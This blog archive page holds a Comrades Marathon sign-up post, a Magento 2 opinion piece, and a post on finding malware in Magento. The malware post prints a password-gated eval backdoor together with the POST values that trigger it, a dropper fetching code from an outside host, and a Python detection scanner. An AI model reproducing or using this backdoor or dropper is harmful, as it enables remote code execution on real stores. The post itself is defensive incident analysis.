Month: November 2016

Well, I’m Running Comrades…

I've been running parkruns, I enjoy running and I have been improving. So I set myself a target of a sub-25-minute parkrun (5 km) before I would buy new running shoes. I made it and bought the shoes. I was so stoked that I signed up for Comrades when I got home. So on the 23rd of November 2016 I signed up and paid the entry... Well, I'm running Comrades...

Comrades Marathon

Entries closed on the 30th of November; as you can see, the page is now 404ing.

[Image: the Comrades 2017 entry page returning a 404]

Finding Malicious Code on Magento

The first thing to do is check your site from an outside perspective, the way any black hatter would.

The Frontend scan

Use Magescan: ./magescan scan:all <site>

This scan will usually tell you which official Magento patches are applied and which are missing. The first thing to do is apply the missing ones immediately.

Next, check under Installed Modules for any known vulnerable modules. A classic problem extension is:


+------------------------+-----------+
| Module                 | Installed |
+------------------------+-----------+
| VladimirPopov_WebForms | Yes       |
+------------------------+-----------+

This extension allows users to upload anything they want onto your server, including files with the extension .php.

So get rid of that thing as soon as you can.

A server side scan

Now it is time to scan for malicious code and remote-execution backdoors that are already part of your Magento install.

The best thing to use is a Magento malware YARA rule collection.

The command to run is: yara -r rules/all-confirmed.yar /path/to/directory

It matches files against MD5 hashes of known malware and flags eval expressions fed from request input. On this site it found two files:


eval_post My-site/magento/media/dhl/info.php
md5_c647e85ad77fd9971ba709a08566935d My-site/magento/media/wysiwyg/12345.php

The contents of info.php are:


<?php
// Hard-coded "password": this is md5('helloworld')
$hash = 'fc5e038d38a57032085441e7fe7010b0';
if(isset($_POST['ue'])){
    // If the posted password hashes to the stored value, decode the posted PHP and execute it
    if (md5($_POST['hash']) === $hash) @eval(base64_decode($_POST['ue']));
    exit;
}
if(isset($_GET['sesion'])){
    // Leaks the server configuration to anyone who knows the parameter name
    phpinfo();
}

The contents of 12345.php are:


<?php
// Fetch attacker-controlled content from a remote host...
$cmd1 = file_get_contents("http://seotramp.com/wp-content/plugins/youtuber/cache.txt");
// ...and write it out as an executable PHP file next to this one
$fo = fopen("cache.php", "w+");
fwrite($fo, $cmd1);
fclose($fo);

I am not too sure about the second one; it looks more like a redirect hack, pulling remote content into cache.php to send you, and maybe your users, to a "Be Rich now if you use the Binary Options System" page.

The first one is remote code execution: you base64-encode your PHP and send it along with a password whose MD5 matches the hard-coded hash. I think they add all of these extra things just to confuse developers into thinking there is nothing going on here.

So to try it out we can make a POST to media/dhl/info.php with

$_POST['ue'] = ZWNobyAnaGVsbG8gd29ybGQnOw==

and

$_POST['hash'] = helloworld

ZWNobyAnaGVsbG8gd29ybGQnOw== base64-decodes to echo 'hello world'; and md5('helloworld') is exactly the hard-coded hash, so the script evals it.

So that is remote code execution.
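As an added example, not from the original post and not part of the YARA rule collection it uses: a small Python scanner that reproduces the two detection classes behind the yara output above (a known-bad MD5 list and an eval(base64_decode($_POST[...])) pattern) and adds two defender heuristics of my own, a remote-fetch-written-into-.php dropper pattern for the second sample and a flag on any PHP file under media/ or var/. It runs over a constructed directory tree containing reconstructions of the two samples and one clean file. The domain in the dropper sample is a placeholder, and the reconstructed 12345.php is hashed at runtime and registered as known-bad because the MD5 on the page (c647e85ad77fd9971ba709a08566935d) belongs to the original file, not to this reconstruction.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# IoC taken from the scan output in the post; a real rule set carries many of these.
KNOWN_BAD_MD5 = {"c647e85ad77fd9971ba709a08566935d"}

# eval of attacker-supplied base64 input: the pattern behind the "eval_post" hit.
EVAL_POST_RE = re.compile(
    r"@?eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I)

# Remote fetch whose body is written into a .php file (a dropper, as in 12345.php).
# Heuristic added here, not one of the page's YARA rules.
REMOTE_DROPPER_RE = re.compile(
    r"file_get_contents\s*\(\s*['\"]https?://.+?\bfopen\s*\(\s*['\"][^'\"]*\.php['\"]",
    re.I | re.S)

# Magento 1 directories that hold uploads and should never contain executable PHP
# (assumption about the layout; heuristic added here).
UPLOAD_DIRS = {"media", "var"}
PHP_SUFFIXES = {".php", ".phtml"}


def scan_file(path, root):
    """Return a list of (rule, relative_path) hits for one file."""
    data = path.read_bytes()
    rel = path.relative_to(root).as_posix()
    hits = []
    digest = hashlib.md5(data).hexdigest()
    if digest in KNOWN_BAD_MD5:
        hits.append(("md5_" + digest, rel))
    text = data.decode("utf-8", errors="replace")
    if EVAL_POST_RE.search(text):
        hits.append(("eval_post", rel))
    if REMOTE_DROPPER_RE.search(text):
        hits.append(("remote_dropper", rel))
    if path.suffix.lower() in PHP_SUFFIXES and rel.split("/", 1)[0] in UPLOAD_DIRS:
        hits.append(("php_in_upload_dir", rel))
    return hits


def scan_tree(root):
    """Walk a Magento root and collect hits in the same 'rule path' shape yara prints."""
    root = Path(root)
    hits = []
    for p in sorted(root.rglob("*")):
        if p.is_file():
            hits.extend(scan_file(p, root))
    return hits


# --- constructed samples: reconstructions of the two files shown in the post ---
INFO_PHP = b"""<?php
$hash = 'fc5e038d38a57032085441e7fe7010b0';
if(isset($_POST['ue'])){
    if (md5($_POST['hash']) === $hash) @eval(base64_decode($_POST['ue']));
    exit;
}
"""
DROPPER_PHP = b"""<?php
$cmd1 = file_get_contents("http://attacker.example/cache.txt");
$fo = fopen("cache.php", "w+");
fwrite($fo, $cmd1);
fclose($fo);
"""
CLEAN_PHP = b"<?php\nclass Mage_Demo_Helper { public function ok() { return true; } }\n"


def build_demo_tree(root):
    """Write the constructed samples into a throwaway Magento-like tree."""
    root = Path(root)
    files = {
        "media/dhl/info.php": INFO_PHP,
        "media/wysiwyg/12345.php": DROPPER_PHP,
        "app/code/local/Mage/Demo/Helper.php": CLEAN_PHP,
    }
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)
    # The reconstruction does not share the original file's MD5, so register its own.
    KNOWN_BAD_MD5.add(hashlib.md5(DROPPER_PHP).hexdigest())


def demo():
    """Build the constructed tree, scan it, and return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rule, rel in demo():
        print(rule, rel)
```

Point scan_tree() at a real Magento root and it prints one line per hit in the same "rule path" shape as the yara run; the php_in_upload_dir rule will also surface any PHP dropped through an upload extension such as the WebForms module mentioned earlier, whether or not a signature exists for it yet.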


Should I Upgrade to Magento 2?

Magento 2 has been around for more than a year now and many store owners are looking for something new to enhance their offerings. Developers have also heard about the numerous enhancements and are no doubt looking to try it out. Well, I have been trying it out for the past few weeks on a project, and I will give an overview of my thoughts, having developed extensively on Magento 1.

Should I Upgrade to Magento 2: The Developer Perspective

Say, for example, you buy a theme and want to extend its CSS in code rather than in the admin section. Creating a child theme is fine and feels good, but integrating with the existing Grunt setup to add a task that builds the CSS from Less is a headache of a nightmare.

Although this should be automatically taken care of, I hear.

Working with frontend JS also requires you to learn... RequireJS, which is pretty tricky but feels right. It is just difficult for the clowns developing themes to take this into account, and their answer to JS console errors is: merge all JS into a single file so it all loads in the correct order.